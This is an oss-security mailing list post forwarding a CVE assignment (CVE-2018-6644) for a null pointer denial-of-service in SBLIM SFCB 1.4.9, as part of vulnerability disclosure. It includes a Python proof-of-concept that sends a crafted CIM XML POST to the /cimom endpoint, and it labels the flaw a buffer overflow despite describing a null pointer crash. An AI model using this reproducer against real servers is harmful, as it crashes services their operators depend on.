Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 7 Feb 2018 13:04:18 +0800 (CST)
From: XinleiHe  <hxl1999@...h.net>
To: oss-security@...ts.openwall.com
Subject: Fw:Re: [scr459004] sfcb - 1.4.9











-------- Forwarding messages --------
From: cve-request@...re.org
Date: 2018-02-06 04:11:55
To:  hxl1999@...h.net
Cc:  cve-request@...re.org
Subject: Re: [scr459004] sfcb - 1.4.9
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

The CVE ID is below. Please inform the software maintainer that the
CVE ID has been assigned.


> [Suggested description]
> SBLIM Small Footprint CIM Broker (SFCB) 1.4.9 has a
> null pointer (DoS) vulnerability via
> a crafted POST request to the /cimom URI.
> 
> ------------------------------------------
> 
> [Additional Information]
> You can use following python code to reproduce this vulnerability.
> 
> import httplib
> from xml.dom.minidom import Document
> class write_xml(Document):
>     def __init__(self):
> 
>         Document.__init__(self)
>  
>     def set_tag(self,tag):
>         self.tag = tag
>         self.cim = self.createElement(self.tag)
>         #self.setAttribute("encoding", "utf-8")
>         
>         self.cim.setAttribute("CIMVERSION", "2.0")
>         self.cim.setAttribute("DTDVERSION", "2.0")
>         self.appendChild(self.cim)
> 
>         self.msg = self.createElement("MESSAGE")
>         self.msg.setAttribute("ID", "4711")
>         self.msg.setAttribute("PROTOCOLVERSION","1.0")
>         self.cim.appendChild(self.msg)
> 
>         self.sim = self.createElement("SIMPLEREQ")
>         self.msg.appendChild(self.sim)
> 
>         self.ime = self.createElement("IMETHODCALL")
>         self.ime.setAttribute("NAME","EnumerateInstances")
>         self.sim.appendChild(self.ime)
> 
>         self.local = self.createElement("LOCALNAMESPACEPATH")
>         self.ime.appendChild(self.local)
>           
>         self.names1=self.createElement("NAMESPACE")
>         self.names1.setAttribute("NAME", "root")
>         self.local.appendChild(self.names1)
> 
>     def display(self):
>         print self.toprettyxml(indent="   ")
>     def retdata(self):
>         return self.toprettyxml(indent="   ")
> 
> def httpreq(data):
>  conn = httplib.HTTPConnection("127.0.0.1", 5988, False)
>  conn.request('POST', '/cimom',data)
>  res = conn.getresponse() 
> 
> def main(): 
>  wx = write_xml()
>  wx.set_tag('CIM')
>  print wx.retdata()
>  print httpreq(wx.retdata())
> 
> if __name__=='__main__':
>  main()
> 
> ------------------------------------------
> 
> [Vulnerability Type]
> Buffer Overflow
> 
> ------------------------------------------
> 
> [Vendor of Product]
> SBLIM project
> 
> ------------------------------------------
> 
> [Affected Product Code Base]
> sfcb - 1.4.9
> 
> ------------------------------------------
> 
> [Impact Denial of Service]
> true

Use CVE-2018-6644.


- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJaeLorAAoJEHb/MwWLVhi2xdoP/2OaKyQzIatRABkB35IlzYpR
vkjtDA8uXjMIcnuJr/sYa/zVFjIBRFQ2nLRkJs2d5Ni1uNsZ3hGm5A7Tn3RFsEby
tL6CvtY8h0MBf4xf6ZVdkzwshJyb05qaOB7UfUL5Fskzoxvs2QpcbGKGtbtaKbPU
YZq4t6aIyZW9UMEwheeCBDzGqC/oLVRUxgztgAy8SIhIlVfwtYEmHvafs11cN2XV
EjVvIbaOeRlOfelJvlSKCOjHj0vjOesouiGlMLm3nqYXm5en/T66tuCpaajn4zzO
I/Wj0Fm8tm2w0pkdfcNBewLu7+4bjRsiJ8U0SVPFQaOENvK7C3q6NyrfCgs1qesR
fr4LS9TfOcuuIjxn9w3T0Hr4nOAJnSwTiwmnuKoQblA/Pn/r8CquyKh/Rh/ST6P7
YxLUt9ZzXKf2SlWV1q+68N9RvefoXQFgQdAP2eUG0Y2i8ACZmxCPVLMclwUHvYIG
KFlei2bIp4IADt3zRdndQBzEK1NwFhNwIKSnE7ybRQqFx6yTgoEiOP0CpYZLmRqi
g94pvunSBKqPcCNhW/C78orO0Tz7UegnkaBMNYgIgW/jCFEiFGSBgi4VIjW8WWrr
M+BM/UGehRBbGjmRqphsOBHdc1H9VKUAWJ0Y4hzQAd5Y6QCcTWb0uMlbNMjINshR
4TNbCFPf5EWJy7Bw8Gic
=q5wy
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ